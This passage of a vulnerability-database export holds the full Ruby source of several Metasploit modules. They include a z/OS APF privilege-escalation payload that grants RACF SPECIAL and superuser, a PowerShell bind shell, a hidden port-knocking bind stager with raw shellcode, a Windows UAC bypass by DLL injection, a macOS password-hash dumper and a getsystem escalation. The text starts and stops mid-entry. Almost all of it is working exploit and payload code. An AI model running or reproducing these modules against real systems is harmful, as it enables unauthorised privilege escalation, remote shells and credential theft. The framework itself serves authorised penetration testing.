\" TITLE 'APF MISCONFIG PRIVESC FOR MSF'\\n\" \\\n \"APFPRIV CSECT\\n\" \\\n \"***********************************************************************\\n\" \\\n \"* SETUP registers and save areas *\\n\" \\\n \"***********************************************************************\\n\" \\\n \"MAIN STM 14,12,12(13) # Save caller reg\\n\" \\\n \" LR 8,15 # Base register\\n\" \\\n \" USING MAIN,8 # R8 for addressability\\n\" \\\n \" GETMAIN RU,LV=72 # for our savearea\\n\" \\\n \" ST 13,4(,1) # Store Caller's SA address\\n\" \\\n \" ST 1,8(,13) # Put my SA addr in caller's SA\\n\" \\\n \" LR 13,1 # R13 has addr of our SA\\n\" \\\n \" DS 0H # halfword boundaries\\n\" \\\n \"***********************************************************************\\n\" \\\n \"* MAIN PROGRAM STMTS HERE *\\n\" \\\n \"***********************************************************************\\n\" \\\n \" BAL 6,AUTHUSR # branch authuser routine\\n\" \\\n \" B EXITP # exit time\\n\" \\\n \"***********************************************************************\\n\" \\\n \"* AUTHUSER ROUTINE *\\n\" \\\n \"***********************************************************************\\n\" \\\n \"AUTHUSR MODESET KEY=ZERO,MODE=SUP # let's get into supervisor mode!\\n\" \\\n \" L 11,X'224' # R11 points to ASCB\\n\" \\\n \" L 11,X'6C'(11) # R11 points to ASXB\\n\" \\\n \" L 11,X'C8'(11) # R11 points to ACEE\\n\" \\\n \" NI X'26'(11),X'00' # Clear Byte x'26'\\n\" \\\n \" OI X'26'(11),X'B1' # Add Oper & Special to userproc\\n\" \\\n \" NI X'27'(11),X'00' # Clear Byte x'27\\n\" \\\n \" OI X'27'(11),X'80' # ALTER access to all resource\\n\" \\\n \" MODESET KEY=NZERO,MODE=PROB # back to normal\\n\" \\\n \" XR 15,15 # set rc=0 regardless\\n\" \\\n \" BR 6 # R6 has return reg\\n\" \\\n \"***********************************************************************\\n\" \\\n \"* Cleanup and exit - R15 has exit code *\\n\" \\\n \"***********************************************************************\\n\" \\\n \"EXITP LR 1,13 # Move my SA into R1\\n\" \\\n \" LR 2,15 # SAVE RC\\n\" \\\n \" L 13,4(,13) # RST Caller SA Addr\\n\" \\\n \" L 14,12(13) # Reload R14\\n\" \\\n \" FREEMAIN RU,A=(1),LV=72\\n\" \\\n \" LR 15,2 # RESTORE RC\\n\" \\\n \" LM 0,12,20(13) # Reload all but 14/15\\n\" \\\n \" BCR 15,14 # Branch back to caller\\n\" \\\n \" END APFPRIV # end pgm\\n\" \\\n \"ZZ\\n\" \\\n \"//S2 EXEC PGM=IKJEFT01\\n\" \\\n \"//SYSTSIN DD *\\n\" \\\n \" ALU #{datastore['FTPUSER']} SPECIAL\\n\" \\\n \" PE BPX.SUPERUSER CLASS(FACILITY) ID(#{datastore['FTPUSER']}) ACCESS(READ)\\n\" \\\n \" SETR RACL(FACILITY) REF\\n\" \\\n \"/*\\n\" \\\n \"//SYSIN DD DUMMY\\n\" \\\n \"//SYSTSPRT DD SYSOUT=*\\n\" \\\n \"//S3 EXEC PGM=IDCAMS\\n\" \\\n \"//SYSPRINT DD SYSOUT=*\\n\" \\\n \"//TEMPDD DD DSN=#{datastore['APFLIB']},DISP=SHR\\n\" \\\n \"//SYSIN DD *\\n\" \\\n \" DELETE #{datastore['APFLIB']}(APFPRIV) FILE(TEMPDD)\\n\" \\\n \"/*\\n\" \\\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb"}, {"lastseen": "2019-11-30T16:33:12", "bulletinFamily": "exploit", "description": "Listen for a connection and spawn an interactive powershell session\n", "modified": "2019-10-05T18:13:38", "published": "2015-06-01T15:11:23", "id": "MSF:PAYLOAD/WINDOWS/X64/POWERSHELL_BIND_TCP", "href": "", "type": "metasploit", "title": "Windows Interactive Powershell Session, Bind TCP", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/windows/exec_x64'\nrequire 'msf/core/payload/windows/powershell'\nrequire 'msf/base/sessions/powershell'\nrequire 'msf/core/handler/bind_tcp'\n\n###\n#\n# Extends the Exec payload to add a new user.\n#\n###\nmodule MetasploitModule\n\n CachedSize = 1821\n\n include Msf::Payload::Windows::Exec_x64\n include Rex::Powershell::Command\n include Msf::Payload::Windows::Powershell\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows Interactive Powershell Session, Bind TCP',\n 'Description' => 'Listen for a connection and spawn an interactive powershell session',\n 'Author' =>\n [\n 'Ben Turner', # benpturner\n 'Dave Hardy' # davehardy20\n ],\n 'References' =>\n [\n ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::PowerShell,\n ))\n\n # Register command execution options\n register_options(\n [\n OptString.new('LOAD_MODULES', [ false, \"A list of powershell modules separated by a comma to download over the web\", nil ]),\n ])\n # Hide the CMD option...this is kinda ugly\n deregister_options('CMD')\n end\n\n #\n # Override the exec command string\n #\n def powershell_command\n generate_powershell_code(\"Bind\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/powershell_bind_tcp.rb"}, {"lastseen": "2019-12-01T18:24:35", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as \"closed,\" thus helping to hide the shellcode\n", "modified": "2017-07-24T13:26:21", "published": "2014-12-27T21:03:45", "id": "MSF:PAYLOAD/WINDOWS/SHELL/BIND_HIDDEN_IPKNOCK_TCP", "href": "", "type": "metasploit", "title": "Windows Command Shell, Hidden Bind Ipknock TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\n\n\nmodule MetasploitModule\n\n CachedSize = 359\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows\n\n\n def self.handler_type_alias\n \"bind_hidden_ipknock_tcp\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Hidden Bind Ipknock TCP Stager',\n 'Description' => 'Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode',\n 'Author' =>\n [\n 'hdm', # original payload module (stager bind_tcp)\n 'skape', # original payload module (stager bind_tcp)\n 'sf', # original payload module (stager bind_tcp)\n 'Borja Merino <bmerinofe[at]gmail.com>' # Add Hidden Ipknock functionality\n ],\n 'License' => MSF_LICENSE,\n 'References' => ['URL', 'http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html'],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n {\n 'RequiresMidstager' => false,\n 'Offsets' =>\n {\n 'LPORT' => [ 193, 'n' ],\n 'KHOST' => [ 255, 'ADDR' ]\n },\n 'Payload' =>\n # Length: 359 bytes\n \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\" +\n \"\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\" +\n \"\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\" +\n \"\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\" +\n \"\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\" +\n \"\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\" +\n \"\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\" +\n \"\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\" +\n \"\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\" +\n \"\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\" +\n \"\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\" +\n \"\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x31\\xdb\\x53\\x68\\x02\" +\n \"\\x00\\x11\\x5c\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\xc2\\xdb\\x37\\x67\\xff\\xd5\" +\n \"\\x6a\\x01\\x54\\x68\\x02\\x30\\x00\\x00\\x68\\xff\\xff\\x00\\x00\\x57\\x68\\xf1\" +\n \"\\xa2\\x77\\x29\\xff\\xd5\\x53\\x57\\x68\\xb7\\xe9\\x38\\xff\\xff\\xd5\\x53\\xe8\" +\n \"\\x1a\\x00\\x00\\x00\\x8b\\x44\\x24\\x04\\x8b\\x40\\x04\\x8b\\x40\\x04\\x2d\\xc0\" +\n \"\\xa8\\x01\\x21\\x74\\x03\\x31\\xc0\\x40\\x89\\x45\\x54\\xc2\\x20\\x00\\x53\\x53\" +\n \"\\x57\\x68\\x94\\xac\\xbe\\x33\\xff\\xd5\\x83\\x7c\\x24\\x04\\x00\\x75\\xcf\\x40\" +\n \"\\x75\\x06\\x53\\x53\\xeb\\xe8\\x74\\xc6\\x48\\x57\\x97\\x68\\x75\\x6e\\x4d\\x61\" +\n \"\\xff\\xd5\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x8b\" +\n \"\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\" +\n \"\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\" +\n \"\\x01\\xc3\\x29\\xc6\\x75\\xee\\xc3\"\n }\n ))\n\n register_options([\n OptAddress.new('KHOST', [true, \"IP address allowed\", nil])\n ])\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb"}, {"lastseen": "2019-11-22T16:57:25", "bulletinFamily": "exploit", "description": "This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.\n", "modified": "2019-09-08T04:42:21", "published": "2013-09-27T08:10:49", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_INJECTION", "href": "", "type": "metasploit", "title": "Windows Escalate UAC Protection Bypass (In Memory Injection)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Exploit::EXE\n include Exploit::FileDropper\n include Post::File\n include Post::Windows::Priv\n include Post::Windows::ReflectiveDLLInjection\n include Post::Windows::Runas\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Escalate UAC Protection Bypass (In Memory Injection)',\n 'Description' => %q{\n This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off. This module uses the Reflective DLL Injection\n technique to drop only the DLL payload binary instead of three separate\n binaries in the standard technique. However, it requires the correct\n architecture to be selected, (use x64 for SYSWOW64 systems also).\n If specifying EXE::Custom your DLL should call ExitProcess() after starting\n your payload in a separate process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'David Kennedy \"ReL1K\" <kennedyd013[at]gmail.com>',\n 'mitnick',\n 'mubix', # Port to local exploit\n 'Ben Campbell', # In memory technique\n 'Lesage', # Win8+ updates\n 'OJ Reeves' # Win 8+ updates\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'DefaultTarget' => 0,\n 'References' =>\n [\n ['URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/'],\n ['URL', 'http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html']\n ],\n 'DisclosureDate'=> 'Dec 31 2010'\n ))\n\n end\n\n def exploit\n # Validate that we can actually do things before we bother\n # doing any more work\n validate_environment!\n check_permissions!\n\n # get all required environment variables in one shot instead. This\n # is a better approach because we don't constantly make calls through\n # the session to get the variables.\n env_vars = get_envs('TEMP', 'WINDIR')\n\n case get_uac_level\n when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,\n UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,\n UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT\n fail_with(Failure::NotVulnerable,\n \"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...\"\n )\n when UAC_DEFAULT\n print_good('UAC is set to Default')\n print_good('BypassUAC can bypass this setting, continuing...')\n when UAC_NO_PROMPT\n print_warning('UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead')\n shell_execute_exe\n return\n end\n\n dll_path = bypass_dll_path\n payload_filepath = \"#{env_vars['TEMP']}\\\\#{rand_text_alpha(8)}.dll\"\n\n upload_payload_dll(payload_filepath)\n\n pid = spawn_inject_proc(env_vars['WINDIR'])\n\n file_paths = get_file_paths(env_vars['WINDIR'], payload_filepath)\n run_injection(pid, dll_path, file_paths)\n\n # Windows 7 this is cleared up by DLL but on Windows\n # 8.1 it fails to delete the the file.\n register_file_for_cleanup(file_paths[:szElevDllFull])\n end\n\n def bypass_dll_path\n # path to the bypassuac binary\n path = ::File.join(Msf::Config.data_directory, 'post')\n\n sysarch = sysinfo['Architecture']\n if sysarch == ARCH_X64\n unless (target_arch.first =~ /64/i) && (payload_instance.arch.first =~ /64/i)\n fail_with(Failure::BadConfig, 'x86 Target Selected for x64 System')\n end\n else\n if (target_arch.first =~ /64/i) || (payload_instance.arch.first =~ /64/i)\n fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')\n end\n end\n\n ::File.join(path, \"bypassuac-#{sysarch}.dll\")\n end\n\n def check_permissions!\n # Check if you are an admin\n vprint_status('Checking admin status...')\n admin_group = is_in_admin_group?\n\n if admin_group.nil?\n print_error('Either whoami is not there or failed to execute')\n print_error('Continuing under assumption you already checked...')\n else\n if admin_group\n print_good('Part of Administrators group! Continuing...')\n else\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n end\n\n if get_integrity_level == INTEGRITY_LEVEL_SID[:low]\n fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')\n end\n end\n\n def run_injection(pid, dll_path, file_paths)\n vprint_status(\"Injecting #{datastore['DLL_PATH']} into process ID #{pid}\")\n begin\n path_struct = create_struct(file_paths)\n\n vprint_status(\"Opening process #{pid}\")\n host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)\n exploit_mem, offset = inject_dll_into_process(host_process, dll_path)\n\n vprint_status(\"Injecting struct into #{pid}\")\n struct_addr = host_process.memory.allocate(path_struct.length)\n host_process.memory.write(struct_addr, path_struct)\n\n vprint_status('Executing payload')\n thread = host_process.thread.create(exploit_mem + offset, struct_addr)\n print_good(\"Successfully injected payload in to process: #{pid}\")\n client.railgun.kernel32.WaitForSingleObject(thread.handle, 14000)\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Failed to Inject Payload to #{pid}!\")\n vprint_error(e.to_s)\n end\n end\n\n # Create a process in the native architecture\n def spawn_inject_proc(win_dir)\n print_status('Spawning process with Windows Publisher Certificate, to inject into...')\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n cmd = \"#{win_dir}\\\\sysnative\\\\notepad.exe\"\n else\n cmd = \"#{win_dir}\\\\System32\\\\notepad.exe\"\n end\n pid = cmd_exec_get_pid(cmd)\n\n unless pid\n fail_with(Failure::Unknown, 'Spawning Process failed...')\n end\n\n pid\n end\n\n def upload_payload_dll(payload_filepath)\n payload = generate_payload_dll({:dll_exitprocess => true})\n print_status('Uploading the Payload DLL to the filesystem...')\n begin\n vprint_status(\"Payload DLL #{payload.length} bytes long being uploaded..\")\n write_file(payload_filepath, payload)\n register_file_for_cleanup(payload_filepath)\n rescue Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::Unknown, \"Error uploading file #{payload_filepath}: #{e.class} #{e}\")\n end\n end\n\n def validate_environment!\n fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?\n\n winver = sysinfo['OS']\n\n case winver\n when /Windows (7|8|2008|2012|10)/\n print_good(\"#{winver} may be vulnerable.\")\n else\n fail_with(Failure::NotVulnerable, \"#{winver} is not vulnerable.\")\n end\n\n if is_uac_enabled?\n print_status('UAC is Enabled, checking level...')\n else\n unless is_in_admin_group?\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n end\n end\n\n def get_file_paths(win_path, payload_filepath)\n paths = {}\n\n case sysinfo['OS']\n when /Windows (7|2008)/\n paths[:szElevDll] = 'CRYPTBASE.dll'\n paths[:szElevDir] = \"#{win_path}\\\\System32\\\\sysprep\"\n paths[:szElevDirSysWow64] = \"#{win_path}\\\\sysnative\\\\sysprep\"\n paths[:szElevExeFull] = \"#{paths[:szElevDir]}\\\\sysprep.exe\"\n when /Windows (8|2012|10)/\n paths[:szElevDll] = 'NTWDBLIB.dll'\n paths[:szElevDir] = \"#{win_path}\\\\System32\"\n # This should be fine to be left blank\n paths[:szElevDirSysWow64] = ''\n paths[:szElevExeFull] = \"#{paths[:szElevDir]}\\\\cliconfg.exe\"\n end\n\n paths[:szElevDllFull] = \"#{paths[:szElevDir]}\\\\#{paths[:szElevDll]}\"\n paths[:szTempDllPath] = payload_filepath\n\n paths\n end\n\n # Creates the paths struct which contains all the required paths\n # the dll needs to copy/execute etc.\n def create_struct(paths)\n\n # write each path to the structure in the order they\n # are defined in the bypass uac binary.\n struct = ''\n struct << fill_struct_path(paths[:szElevDir])\n struct << fill_struct_path(paths[:szElevDirSysWow64])\n struct << fill_struct_path(paths[:szElevDll])\n struct << fill_struct_path(paths[:szElevDllFull])\n struct << fill_struct_path(paths[:szElevExeFull])\n struct << fill_struct_path(paths[:szTempDllPath])\n\n struct\n end\n\n def fill_struct_path(path)\n path = Rex::Text.to_unicode(path)\n path + \"\\x00\" * (520 - path.length)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/bypassuac_injection.rb"}, {"lastseen": "2019-10-24T14:42:21", "bulletinFamily": "exploit", "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10.3 to 10.14.\n", "modified": "2019-05-30T22:33:45", "published": "2012-10-23T18:24:05", "id": "MSF:POST/OSX/GATHER/HASHDUMP", "href": "", "type": "metasploit", "title": "OS X Gather Mac OS X Password Hash Collector", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Post\n # set of accounts to ignore while pilfering data\n #OSX_IGNORE_ACCOUNTS = [\"Shared\", \".localized\"]\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Post::OSX::System\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'OS X Gather Mac OS X Password Hash Collector',\n 'Description' => %q{\n This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n versions 10.3 to 10.14.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Carlos Perez <carlos_perez[at]darkoperator.com>',\n 'hammackj <jacob.hammack[at]hammackj.com>',\n 'joev'\n ],\n 'Platform' => [ 'osx' ],\n 'SessionTypes' => [ 'shell' ]\n ))\n register_options([\n OptRegexp.new('MATCHUSER', [false,\n 'Only attempt to grab hashes for users whose name matches this regex'\n ])\n ])\n end\n\n # Run Method for when run command is issued\n def run\n unless is_root?\n fail_with(Failure::BadConfig, 'Insufficient Privileges: must be running as root to dump the hashes')\n end\n\n # iterate over all users\n get_nonsystem_accounts.each do |user_info|\n user = user_info['name']\n next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user\n print_status \"Attempting to grab shadow for user #{user}...\"\n if gt_lion? # 10.8+\n # pull the shadow from dscl\n shadow_bytes = grab_shadow_blob(user)\n next if shadow_bytes.blank?\n\n # on 10.8+ ShadowHashData stores a binary plist inside of the user.plist\n # Here we pull out the binary plist bytes and use built-in plutil to convert to xml\n plist_bytes = shadow_bytes.split('').each_slice(2).map{|s| \"\\\\x#{s[0]}#{s[1]}\"}.join\n\n # encode the bytes as \\x hex string, print using bash's echo, and pass to plutil\n shadow_plist = cmd_exec(\"/bin/bash -c 'echo -ne \\\"#{plist_bytes}\\\" | plutil -convert xml1 - -o -'\")\n\n # read the plaintext xml\n shadow_xml = REXML::Document.new(shadow_plist)\n\n # parse out the different parts of sha512pbkdf2\n dict = shadow_xml.elements[1].elements[1].elements[2]\n entropy = Rex::Text.to_hex(dict.elements[2].text.gsub(/\\s+/, '').unpack('m*')[0], '')\n iterations = dict.elements[4].text.gsub(/\\s+/, '')\n salt = Rex::Text.to_hex(dict.elements[6].text.gsub(/\\s+/, '').unpack('m*')[0], '')\n\n # PBKDF2 stored in <iterations, salt, entropy> format\n decoded_hash = \"$ml$#{iterations}$#{salt}$#{entropy}\"\n report_hash(\"SHA-512 PBKDF2\", decoded_hash, user)\n elsif lion? # 10.7\n # pull the shadow from dscl\n shadow_bytes = grab_shadow_blob(user)\n next if shadow_bytes.blank?\n\n # on 10.7 the ShadowHashData is stored in plaintext\n hash_decoded = shadow_bytes.downcase\n\n # Check if NT HASH is present\n if hash_decoded =~ /4f1010/\n report_hash(\"NT\", hash_decoded.scan(/^\\w*4f1010(\\w*)4f1044/)[0][0], user)\n end\n\n # slice out the sha512 hash + salt\n # original regex left for historical purposes. During testing it was discovered that\n # 4f110200 was also a valid end. Instead of looking for the end, since its a hash (known\n # length) we can just set the length\n #sha512 = hash_decoded.scan(/^\\w*4f1044(\\w*)(080b190|080d101e31)/)[0][0]\n sha512 = hash_decoded.scan(/^\\w*4f1044(\\w{136})/)[0][0]\n report_hash(\"SHA-512\", sha512, user)\n else # 10.6 and below\n # On 10.6 and below, SHA-1 is used for encryption\n guid = if gte_leopard?\n cmd_exec(\"/usr/bin/dscl localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-\").chomp\n elsif lte_tiger?\n cmd_exec(\"/usr/bin/niutil -readprop . /users/#{user} generateduid\").chomp\n end\n\n # Extract the hashes\n sha1_hash = cmd_exec(\"cat /var/db/shadow/hash/#{guid} | cut -c169-216\").chomp\n nt_hash = cmd_exec(\"cat /var/db/shadow/hash/#{guid} | cut -c1-32\").chomp\n lm_hash = cmd_exec(\"cat /var/db/shadow/hash/#{guid} | cut -c33-64\").chomp\n\n # Check that we have the hashes and save them\n if sha1_hash !~ /0000000000000000000000000/\n report_hash(\"SHA-1\", sha1_hash, user)\n end\n if nt_hash !~ /000000000000000/\n report_hash(\"NT\", nt_hash, user)\n end\n if lm_hash !~ /0000000000000/\n report_hash(\"LM\", lm_hash, user)\n end\n end\n end\n end\n\n private\n\n # @return [Bool] system version is at least 10.5\n def gte_leopard?\n ver_num =~ /10\\.(\\d+)/ and $1.to_i >= 5\n end\n\n # @return [Bool] system version is at least 10.8\n def gt_lion?\n ver_num =~ /10\\.(\\d+)/ and $1.to_i >= 8\n end\n\n # @return [String] hostname\n def host\n session.session_host\n end\n\n # @return [Bool] system version is 10.7\n def lion?\n ver_num =~ /10\\.(\\d+)/ and $1.to_i == 7\n end\n\n # @return [Bool] system version is 10.4 or lower\n def lte_tiger?\n ver_num =~ /10\\.(\\d+)/ and $1.to_i <= 4\n end\n\n # parse the dslocal plist in lion\n def read_ds_xml_plist(plist_content)\n doc = REXML::Document.new(plist_content)\n keys = []\n doc.elements.each(\"plist/dict/key\") { |n| keys << n.text }\n\n fields = {}\n i = 0\n doc.elements.each(\"plist/dict/array\") do |element|\n data = []\n fields[keys[i]] = data\n element.each_element(\"*\") do |thing|\n data_set = thing.text\n if data_set\n data << data_set.gsub(\"\\n\\t\\t\",\"\")\n else\n data << data_set\n end\n end\n i+=1\n end\n return fields\n end\n\n # reports the hash info to metasploit backend\n def report_hash(type, hash, user)\n return unless hash.present?\n print_good(\"#{type}:#{user}:#{hash}\")\n case type\n when \"NT\"\n private_data = \"#{Metasploit::Credential::NTLMHash::BLANK_LM_HASH}:#{hash}\"\n private_type = :ntlm_hash\n jtr_format = 'ntlm'\n when \"LM\"\n private_data = \"#{hash}:#{Metasploit::Credential::NTLMHash::BLANK_NT_HASH}\"\n private_type = :ntlm_hash\n jtr_format = 'lm'\n when \"SHA-512 PBKDF2\"\n private_data = hash\n private_type = :nonreplayable_hash\n jtr_format = 'PBKDF2-HMAC-SHA512'\n when \"SHA-512\"\n private_data = hash\n private_type = :nonreplayable_hash\n jtr_format = 'xsha512'\n when \"SHA-1\"\n private_data = hash\n private_type = :nonreplayable_hash\n jtr_format = 'xsha'\n end\n create_credential(\n jtr_format: jtr_format,\n workspace_id: myworkspace_id,\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: user,\n private_data: private_data,\n private_type: private_type\n )\n print_status(\"Credential saved in database.\")\n end\n\n # @return [String] containing blob for ShadowHashData in user's plist\n # @return [nil] if shadow is invalid\n def grab_shadow_blob(user)\n shadow_bytes = cmd_exec(\"dscl . read /Users/#{user} dsAttrTypeNative:ShadowHashData\").gsub(/\\s+/, '')\n return nil unless shadow_bytes.start_with? 'dsAttrTypeNative:ShadowHashData:'\n # strip the other bytes\n shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '')\n end\n\n # @return [String] version string (e.g. 10.8.5)\n def ver_num\n @product_version ||= get_sysinfo['ProductVersion']\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/gather/hashdump.rb"}, {"lastseen": "2019-11-24T05:35:56", "bulletinFamily": "exploit", "description": "This module uses the builtin 'getsystem' command to escalate the current session to the SYSTEM account from an administrator user account.\n", "modified": "2017-07-24T13:26:21", "published": "2011-11-11T22:19:49", "id": "MSF:POST/WINDOWS/ESCALATE/GETSYSTEM", "href": "", "type": "metasploit", "title": "Windows Escalate Get System via Administrator", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasm'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Priv\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Escalate Get System via Administrator',\n 'Description' => %q{\n This module uses the builtin 'getsystem' command to escalate\n the current session to the SYSTEM account from an administrator\n user account.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'hdm',\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options([\n OptInt.new('TECHNIQUE', [false, \"Specify a particular technique to use (1-4), otherwise try them all\", 0])\n ])\n\n end\n\n def unsupported\n print_error(\"This platform is not supported with this script!\")\n raise Rex::Script::Completed\n end\n\n def run\n\n technique = datastore['TECHNIQUE'].to_i\n\n unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)\n\n if is_system?\n print_good(\"This session already has SYSTEM privileges\")\n return\n end\n\n begin\n result = client.priv.getsystem(technique)\n print_good(\"Obtained SYSTEM via technique #{result[1]}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Failed to obtain SYSTEM access\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/escalate/getsystem.rb"}, {"lastseen": "2019-12-02T14:16:50", "bulletinFamily": "exploit", "description": "This module abuses the 'mimencode' binary present within ContentKeeper Web filtering appliances to retrieve arbitrary files outside of the webroot.\n", "modified": "2017-11-08T16:00:24", "published": "2011-04-10T15:27:17", "id": "MSF:AUXILIARY/ADMIN/HTTP/CONTENTKEEPER_FILEACCESS", "href": "", "type": "metasploit", "title": "ContentKeeper Web Appliance mimencode File Access", "sourceData": "##\n# This module requires Metasploit: 